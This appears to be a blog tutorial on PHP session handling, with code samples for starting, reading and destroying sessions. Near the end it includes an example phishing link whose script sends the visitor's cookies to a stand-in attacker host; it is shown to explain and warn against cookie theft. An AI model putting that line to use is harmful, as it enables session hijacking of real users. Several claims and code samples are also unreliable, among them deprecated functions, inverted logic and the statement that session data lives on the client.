php programming

The Internet browser session begins when the user makes the first request for any web page in a website within a browser. PHP has several built-in functions for working with the session; each having its own brand of important information:

  • session_name – The current session name.
  • session_id – The session id.
  • session_module_name – The name of the session module.
  • session_save_path – The session save path.
  • session_encode – The contents of the current session in coded format.
  • and several others

A session variable usually has a much smaller lifetime than a PHP cookie or a Flash Cookie, and will live only for the duration of the browser session.

What Happens When the PHP Session is Instantiated?

When a new PHP session is started on the server, a random 32 digit hex number is generated and an empty session file is saved on the server to cache the session information in. The name of this file name consists of the word ‘sess_’ and the new session id hex number.

A session cookie will be created at the same time allowing the response object to stay in sync with the browser session.

Data inside the session will NOT be available across multiple servers. One browser on One server is how the session data is limited. It is best to make use of PHP Cookies, or a database table to persist data across multiple servers with the same browser session.

If there are multiple include files on a PHP file, care should be taken that the session was not started in another include file and that the http header, (i.e. any http content) is not sent previous to issuing the session_start() command. Most programmers simply make the session_start() command the first line in the PHP file to avoid that problem.

It is best to limit session variable names to alphanumerics in order to avoid using invalid ASCII characters such as spaces or dashes.

Start the PHP Session with Code and Read a Session Variable:

<?PHP
// Start the session
session_start();
session_register('userid');
$_SESSION['userid']=$userid;
// Reference a session variable
if(!isset($_SESSION['userid']))
{
$userid=$_SESSION['userid'];
}
?>

Read All Session Variables and Unregister a Single Variable:

<?PHP
//print all session variables
print "\nContents of \$_SESSION:\n";
foreach ($_SESSION as $k => $v) {
print " $k = $v\n";
}
//unregistering session variables
session_start();
session_unregister ('userid');
session_unregister ('username');
?>

Unset All Session Variables and Destroy Session:

<?PHP
//unset all session variables
session_unset();
//destroy session
session_destroy();
?>

A PHP session is not always destroyed on purpose. Some of the reasons that a PHP session may be destroyed are:

  1. The user navigates to a different domain.
  2. The browser is shut down.
  3. If the browser is left inactive for a period of about 24 minutes.
  4. The program can issue a session_destroy() command if this is coded by the programmer.
  5. The program can issue a session_unregister() command which destroys the session.

A phpSessionSheet is available with all sourcecode from this article.

Session variables are easily accessed and readable. For this reason it is best to never place sensitive data in session variables. Session variables also live on the client machine rather than the server. Sensitive data should usually reside in the database and be encrypted with an algorithm which makes use of a key. If any sensitive data is kept on the server, proper server folder security should be employed to protect the files. Generally the session is used for non-sensitive website data which allows navigation and user experience to be more enjoyable and intuitive.

How can a Web User’s Cookie and Session Variables Be Viewed By a Phishing Website?

Cookies cannot be directly viewed by a website. There is however an exploit whereby a website can

take a snapshot of a web user’s cookies by getting the web user to perform a quick action without thinking. There are many opportunities online where users can be presented a message with a link to click on. This can be online bulletin boards, messaging programs, emails, popup advertisements, etc. When a user receives a message, the sender is not recognized recognized, and there is a clickable link in the message: this could be and probably is an exploit to get personal information. Here is how it works. The user is presented with a communication with a link such as:

<a href='#' 
onclick='window.location='http://www.bigbadwolf.com/takeusercookies.cgi?
text='+escape(document.cookie); 
return false;">We have been looking for you. 
Click Here to claim your $500,000.00 inheritance!</a>

The presentation, message, and theme will all be geared toward getting the user to click the link very fast. This will usually be stated as a one time offer, expiring in x number of days, etc. If the user clicks the link and the above script is executed, reads and saves the user’s personal cookie and session data from their machine and then redirect the user to a page immediately which talks about the original offer. The act of having personal information stolen will take place so fast, it will be completely unnoticeable. It is good practice to never click on a link from a company or user that is unknown.

Session variables in PHP are easy to use, reuse, and discard as long as the rules are followed and some basic precautions taken. They can be another valuable tool in your PHP toolbox.

Leave a Reply

Your email address will not be published.